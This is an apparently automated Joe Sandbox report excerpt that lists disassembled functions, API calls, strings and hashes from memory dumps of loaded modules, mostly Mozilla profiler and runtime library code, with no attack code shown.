__Init_thread_footer.LIBCMT ref: 6D58949F

Strings

MOZ_BASE_PROFILER_LOGGING, xrefs: 6D58947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6D58946B
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6D589459

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 6db3acd066766edf496ff06814b7c35b34c9b454be73e77113736aaf78aa2bf7
Instruction ID: 984b14d5c300e0fdb95178ccb2340af23d953b484e570e27a9a61664c00db264
Opcode Fuzzy Hash: 6db3acd066766edf496ff06814b7c35b34c9b454be73e77113736aaf78aa2bf7
Instruction Fuzzy Hash: C301D470A015128BEF188BACD851B6D33B5BB46329F12453FED0A86E63EB21E8508D53

Function 6D5BB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6D5BB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6D5BB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6D5BB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6D5BB5F4
__Init_thread_footer.LIBCMT ref: 6D5BB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6D5BB61F
std::_Facet_Register.LIBCPMT ref: 6D5BB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D5BB655

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 5c952b67ee67bff14026313995e1d7e5180048503ba5362a63b5a95cc8e9a9e5
Instruction ID: 4c8e6d937bfb8d50c5d827efc336033172b9fd4b7162f052bf375062bcc49399
Opcode Fuzzy Hash: 5c952b67ee67bff14026313995e1d7e5180048503ba5362a63b5a95cc8e9a9e5
Instruction Fuzzy Hash: 1231A771A00905CBCF14EF69C894A6EB7B5FF85321F12051DD91697B80EB70AD46CF92

Function 6D565670 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6D5656D1
GetTickCount64.KERNEL32 ref: 6D5658CB
EnterCriticalSection.KERNEL32(6D5CF688), ref: 6D5658F3
__aulldiv.LIBCMT ref: 6D565945
LeaveCriticalSection.KERNEL32(6D5CF688), ref: 6D5659B2

Strings

MOZ_APP_RESTART, xrefs: 6D5656CC

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 3245772305-2657566371
Opcode ID: 32f182354e199c8c8e5ff786abae7f2225636f8ed763c4e70daf9b7bbae13c27
Instruction ID: 268295b91ac4cf37ee4c08a05f5c876ac831ca07f06c62c338c8c44ecee8cb46
Opcode Fuzzy Hash: 32f182354e199c8c8e5ff786abae7f2225636f8ed763c4e70daf9b7bbae13c27
Instruction Fuzzy Hash: 4CC1BD319097819FDB09CF28C44076ABBF1FFCA754F068A1DE8D497A61D730A885CB92

Function 6D55B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6D59CC83,?,?,?,?,?,?,?,?,?,6D59BCAE,?,?,6D58DC2C), ref: 6D55B7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6D59CC83,?,?,?,?,?,?,?,?,?,6D59BCAE,?,?,6D58DC2C), ref: 6D55B80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6D59CC83,?,?,?,?,?,?,?,?,?,6D59BCAE), ref: 6D55B88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6D59CC83,?,?,?,?,?,?,?,?,?,6D59BCAE,?,?,6D58DC2C), ref: 6D55B896

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: c7d40a5e74b59bbf6765d0f0ec4031bd187a429649b770abd278a04139cd48e3
Instruction ID: ff3febfda7477a86e111b622bcd7682880ef53fb4c9617c9eace32c8e94d4291
Opcode Fuzzy Hash: c7d40a5e74b59bbf6765d0f0ec4031bd187a429649b770abd278a04139cd48e3
Instruction Fuzzy Hash: 69517B357006058FCB1AEF58C488B3ABBF5FF89314B59895EE98A97741C731E811CB80

Function 61E01040 Relevance: 10.6, APIs: 7, Instructions: 132sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,61E012DC), ref: 61E01077
_amsg_exit.MSVCRT ref: 61E010A4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
Instruction ID: a154691f748ef5392a7e4955094c5928503ae470ce452f5208c2c148eeae8840
Opcode Fuzzy Hash: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
Instruction Fuzzy Hash: 13414F71B146818FEB00AFE8C98470BB7F1EB85399F64C53DE4A48B344D775D9918B82

Function 6D590000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D590039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D590041
GetCurrentThreadId.KERNEL32 ref: 6D590075
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D590082
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D59011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6D59005B

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpid
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 1430161788-637075127
Opcode ID: 2dc07e15cb7ab3fe77eedbd8685d0123277cb5eec7879442375fe1b234ba958a
Instruction ID: bae73c756fd0fa0d6264d02cc95d06e706a89169ba1437101819166bdb89cd2f
Opcode Fuzzy Hash: 2dc07e15cb7ab3fe77eedbd8685d0123277cb5eec7879442375fe1b234ba958a
Instruction Fuzzy Hash: A5419D75900644DFCB14DF69C880AAABBF0FF89314F42491EEA5A97B51D731AC00CF92

Function 6D551640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6D551699
VerSetConditionMask.NTDLL ref: 6D5516CB
VerSetConditionMask.NTDLL ref: 6D5516D7
VerSetConditionMask.NTDLL ref: 6D5516DE
VerSetConditionMask.NTDLL ref: 6D5516E5
VerSetConditionMask.NTDLL ref: 6D5516EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6D5516F9

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 5a9a69a430f0eea822735b28a4329754255afc9a11e5de65de3fb3702630ffc5
Instruction ID: 3960acf3c7776685201f0a4d282f0602660ca6aac1f04697a839e1eea0cdeebf
Opcode Fuzzy Hash: 5a9a69a430f0eea822735b28a4329754255afc9a11e5de65de3fb3702630ffc5
Instruction Fuzzy Hash: AD21C0B07402086BEB156B688C85FBEB6BCEBC6704F01452DF6459B980DB749D54C7A2

Function 6D58F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D57CBE8: GetCurrentProcess.KERNEL32(?,6D5431A7), ref: 6D57CBF1
Part of subcall function 6D57CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6D5431A7), ref: 6D57CBFA

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6D58F598), ref: 6D58F621

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

GetCurrentThreadId.KERNEL32 ref: 6D58F637
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8,?,?,00000000,?,6D58F598), ref: 6D58F645
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8,?,?,00000000,?,6D58F598), ref: 6D58F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6D58F62A

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: bac86cf9a865ec9b3d2a6fa7348b66d3d74973034478e9803a3e88f9e4c97a7d
Instruction ID: c8166c65859c0fef357c6675d2a9fa1d8075e73ba5b08336ba42d3a205e2fdac
Opcode Fuzzy Hash: bac86cf9a865ec9b3d2a6fa7348b66d3d74973034478e9803a3e88f9e4c97a7d
Instruction Fuzzy Hash: 53110A35105A15ABCF08AF59C444AA57779FFC6759B42041DEA0683F02CB75AC11CFA1

Function 6D552070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

LoadLibraryW.KERNEL32(combase.dll,6D551C5F), ref: 6D5520AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6D5520CD
__Init_thread_footer.LIBCMT ref: 6D5520E1
FreeLibrary.KERNEL32 ref: 6D552124

Strings

CoInitializeSecurity, xrefs: 6D5520C7
combase.dll, xrefs: 6D5520A9

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: f6f68237017759659d2170d0d54fd5e0425078258b5019fa44f8282c03f89ca3
Instruction ID: e26697a5eeeeb614527eef067dbc4dbddc5bb4b25c076153e4684087f32c9075
Opcode Fuzzy Hash: f6f68237017759659d2170d0d54fd5e0425078258b5019fa44f8282c03f89ca3
Instruction Fuzzy Hash: 0D219A36005609AFDF2A8F95DC48FAA3F76FB4A321F024119FA0492A10D331D861CFA1

Function 6D5899A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D5899C1
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D5899CE
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D5899F8
GetCurrentThreadId.KERNEL32 ref: 6D589A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D589A0D

Part of subcall function 6D589A60: GetCurrentThreadId.KERNEL32 ref: 6D589A95
Part of subcall function 6D589A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D589A9D

Part of subcall function 6D57CBE8: GetCurrentProcess.KERNEL32(?,6D5431A7), ref: 6D57CBF1
Part of subcall function 6D57CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6D5431A7), ref: 6D57CBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6D589A15

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Current$Threadgetenv$ExclusiveLockProcess_getpid$AcquireInit_thread_footerReleaseTerminate
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 530996452-141131661
Opcode ID: 88a18e904e5c0d224b6a2cebe59a7daf9bef9c6272d46197ba91804b8af4e034
Instruction ID: fbdb626bc310bd9d10e7f23d9ff5d941ffc7923eb22a19b4598a80727704474d
Opcode Fuzzy Hash: 88a18e904e5c0d224b6a2cebe59a7daf9bef9c6272d46197ba91804b8af4e034
Instruction Fuzzy Hash: 1B0100368099359BDF086FA4D8487793B78EB82259F02401EEE0653F03D7794C00CAA3

Function 6D551FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6D551FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6D551FFD
__Init_thread_footer.LIBCMT ref: 6D552011
FreeLibrary.KERNEL32 ref: 6D552059

Strings

CoCreateInstance, xrefs: 6D551FF7
combase.dll, xrefs: 6D551FD9

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: 8e55e7af8fa90dce1a85362b33ff54c0a4debf6329eb25399dae7fd912bf3c05
Instruction ID: d3187a22ad5da64a03194739c8944f47f9e7fa54d55c883460ee74eb08cadbea
Opcode Fuzzy Hash: 8e55e7af8fa90dce1a85362b33ff54c0a4debf6329eb25399dae7fd912bf3c05
Instruction Fuzzy Hash: 35118E7510A605AFDF299F55CC48F6A3F79EB86366F02412EFE0582A50D730A810CFA2

Function 6D550EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6D57D9F0,00000000), ref: 6D550F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6D550F3C
__Init_thread_footer.LIBCMT ref: 6D550F50
FreeLibrary.KERNEL32(?,6D57D9F0,00000000), ref: 6D550F86

Strings

CoInitializeEx, xrefs: 6D550F36
combase.dll, xrefs: 6D550F18

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 99c8f9f1bf7b8a0916388922b716bf78c4768fa428b974a485c31e0d9ffeaa9d
Instruction ID: c6292b9c5cab2c6a01301b6438e5ce634072e153a6de6273e8a49ea0b6ac0ed7
Opcode Fuzzy Hash: 99c8f9f1bf7b8a0916388922b716bf78c4768fa428b974a485c31e0d9ffeaa9d
Instruction Fuzzy Hash: D511A57950AA019BDF099F69C808F6E3774FF8B726F02462FEA0993E41D730A411CA56

Function 6D58F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58F561

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

GetCurrentThreadId.KERNEL32 ref: 6D58F577
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F585
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6D58F499
[I %d/%d] profiler_resume, xrefs: 6D58F239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6D58F56A
[I %d/%d] profiler_pause_sampling, xrefs: 6D58F3A8

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: bf337a96ec26f6802ff8d39f7c237e5bc6b9405e464d804407c5a9d0054d940e
Instruction ID: 5992afdea52ba4b78e2ad8f5693c48db9174cea53aa27cbb454e56ab42a9926d
Opcode Fuzzy Hash: bf337a96ec26f6802ff8d39f7c237e5bc6b9405e464d804407c5a9d0054d940e
Instruction Fuzzy Hash: 29F054765046149BEF047BA5D888B6A77BDFBCA65DF020419EB0683B03DB754C018B62

Function 6D550E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6D550DF8), ref: 6D550E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6D550EA1
__Init_thread_footer.LIBCMT ref: 6D550EB5
FreeLibrary.KERNEL32 ref: 6D550EC5

Strings

GetProcessMitigationPolicy, xrefs: 6D550E9B
kernel32.dll, xrefs: 6D550E7D

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
